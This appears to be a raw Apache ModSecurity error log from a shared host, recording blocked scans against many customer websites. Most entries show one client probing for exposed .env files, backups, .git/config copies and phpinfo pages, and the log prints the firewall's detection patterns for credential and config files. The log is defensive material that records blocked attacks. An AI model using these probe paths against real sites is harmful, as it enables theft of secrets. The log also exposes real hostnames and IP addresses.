[Tue May 26 14:16:47.875705 2026] [security2:error] [pid 598542:tid 598635] [remote 216.73.216.240:8509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-about.php"] [unique_id "ahVd9_4iWyZxnXeAW3JSMgAAOVw"]
[Tue May 26 14:16:50.014020 2026] [security2:error] [pid 598542:tid 598771] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd-f4iWyZxnXeAW3JSYwAAAGM"]
[Tue May 26 14:16:50.303289 2026] [security2:error] [pid 598542:tid 598737] [client 20.151.111.128:4150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVd-v4iWyZxnXeAW3JSfwAAAEE"]
[Tue May 26 14:16:50.578362 2026] [security2:error] [pid 598542:tid 598687] [client 20.151.111.128:4131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-plain.php"] [unique_id "ahVd-v4iWyZxnXeAW3JSgwAAAA8"], referer: www.google.com
[Tue May 26 14:16:51.757781 2026] [security2:error] [pid 598542:tid 598682] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd-_4iWyZxnXeAW3JSmAAAAAo"]
[Tue May 26 14:16:52.895840 2026] [security2:error] [pid 598542:tid 598762] [client 185.10.4.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVd-_4iWyZxnXeAW3JSlQAAAFo"]
[Tue May 26 14:16:53.487076 2026] [security2:error] [pid 598542:tid 598753] [client 202.141.30.10:35515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd_f4iWyZxnXeAW3JS0wAAAFE"]
[Tue May 26 14:16:53.487194 2026] [security2:error] [pid 598542:tid 598753] [client 202.141.30.10:35515] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd_f4iWyZxnXeAW3JS0wAAAFE"]
[Tue May 26 14:16:53.835261 2026] [security2:error] [pid 598542:tid 598744] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd_f4iWyZxnXeAW3JSzgAAAEg"]
[Tue May 26 14:16:54.082138 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.111.128:4474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVd_v4iWyZxnXeAW3JS5QAAAGg"]
[Tue May 26 14:16:54.656997 2026] [security2:error] [pid 598542:tid 598778] [client 20.151.111.128:13331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/edzbwdla.php"] [unique_id "ahVd_v4iWyZxnXeAW3JS9gAAAGo"], referer: www.google.com
[Tue May 26 14:16:54.781420 2026] [security2:error] [pid 598542:tid 598645] [remote 34.88.138.128:11776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.138.88.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVd_v4iWyZxnXeAW3JS8wAAHmY"]
[Tue May 26 14:16:55.313921 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTBQAANxA"]
[Tue May 26 14:16:55.314361 2026] [security2:error] [pid 598542:tid 598557] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTCQAANw4"]
[Tue May 26 14:16:55.504230 2026] [security2:error] [pid 598542:tid 598585] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.dimcorp.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVd__4iWyZxnXeAW3JTGQAANyo"]
[Tue May 26 14:16:55.506369 2026] [security2:error] [pid 598542:tid 598663] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTHwAAN3g"]
[Tue May 26 14:16:55.507855 2026] [security2:error] [pid 598542:tid 598567] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTIAAANxg"]
[Tue May 26 14:16:55.614609 2026] [autoindex:error] [pid 598542:tid 598677] [client 43.157.52.37:54038] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:16:55.654191 2026] [security2:error] [pid 598542:tid 598578] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTIwAANyM"]
[Tue May 26 14:16:55.658485 2026] [security2:error] [pid 598542:tid 598583] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVd__4iWyZxnXeAW3JTKAAANyg"]
[Tue May 26 14:16:55.659726 2026] [security2:error] [pid 598542:tid 598555] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVd__4iWyZxnXeAW3JTKQAANww"]
[Tue May 26 14:16:56.237407 2026] [security2:error] [pid 598542:tid 598785] [client 185.191.171.12:31816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVeAP4iWyZxnXeAW3JTRAAAAHE"]
[Tue May 26 14:16:56.237567 2026] [security2:error] [pid 598542:tid 598785] [client 185.191.171.12:31816] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVeAP4iWyZxnXeAW3JTRAAAAHE"]
[Tue May 26 14:16:56.281509 2026] [security2:error] [pid 598542:tid 598607] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVeAP4iWyZxnXeAW3JTTAAAYUA"]
[Tue May 26 14:16:56.336062 2026] [security2:error] [pid 598542:tid 598605] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVeAP4iWyZxnXeAW3JTSgAAYT4"]
[Tue May 26 14:16:56.436604 2026] [security2:error] [pid 598542:tid 598639] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env~"] [unique_id "ahVeAP4iWyZxnXeAW3JTXwAADGA"]
[Tue May 26 14:16:56.471200 2026] [security2:error] [pid 598542:tid 598624] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVeAP4iWyZxnXeAW3JTaQAAGlE"]
[Tue May 26 14:16:56.590045 2026] [security2:error] [pid 598542:tid 598627] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVeAP4iWyZxnXeAW3JTbwAASFQ"]
[Tue May 26 14:16:56.590663 2026] [security2:error] [pid 598542:tid 598622] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVeAP4iWyZxnXeAW3JTcAAASE8"]
[Tue May 26 14:16:56.598337 2026] [security2:error] [pid 598542:tid 598630] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVeAP4iWyZxnXeAW3JTcgAAd1c"]
[Tue May 26 14:16:56.788417 2026] [security2:error] [pid 598542:tid 598792] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeAP4iWyZxnXeAW3JTVQAAAHg"]
[Tue May 26 14:16:57.124904 2026] [autoindex:error] [pid 598542:tid 598650] [remote 45.148.10.95:10086] AH01276: Cannot serve directory /home2/jhonwy9v/dimensioncorporativa.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:16:57.148235 2026] [security2:error] [pid 598542:tid 598645] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTrwAALGY"]
[Tue May 26 14:16:57.170584 2026] [security2:error] [pid 598542:tid 598562] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTsQAAZBM"]
[Tue May 26 14:16:57.202891 2026] [security2:error] [pid 598542:tid 598557] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVeAf4iWyZxnXeAW3JTtwAABg4"]
[Tue May 26 14:16:57.308755 2026] [security2:error] [pid 598542:tid 598663] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTwAAAYHg"]
[Tue May 26 14:16:57.314325 2026] [security2:error] [pid 598542:tid 598567] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTwgAAYBg"]
[Tue May 26 14:16:57.315091 2026] [security2:error] [pid 598542:tid 598577] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTwwAAYCI"]
[Tue May 26 14:16:57.318940 2026] [security2:error] [pid 598542:tid 598572] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTxAAAYB0"]
[Tue May 26 14:16:57.319249 2026] [security2:error] [pid 598542:tid 598585] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTxQAAYCo"]
[Tue May 26 14:16:57.335342 2026] [security2:error] [pid 598542:tid 598670] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTyAAAHn8"]
[Tue May 26 14:16:57.335483 2026] [security2:error] [pid 598542:tid 598570] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTxwAAHhs"]
[Tue May 26 14:16:57.659918 2026] [security2:error] [pid 598542:tid 598602] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVeAf4iWyZxnXeAW3JT7QAALTs"]
[Tue May 26 14:16:57.726709 2026] [security2:error] [pid 598542:tid 598605] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/admin-app/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JT9QAAFj4"]
[Tue May 26 14:16:57.843965 2026] [security2:error] [pid 598542:tid 598621] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVeAf4iWyZxnXeAW3JUAgAABE4"]
[Tue May 26 14:16:57.854932 2026] [security2:error] [pid 598542:tid 598666] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVeAf4iWyZxnXeAW3JUBQAAI3s"]
[Tue May 26 14:16:57.890473 2026] [security2:error] [pid 598542:tid 598667] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/api-backend/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JUCAAAP3w"]
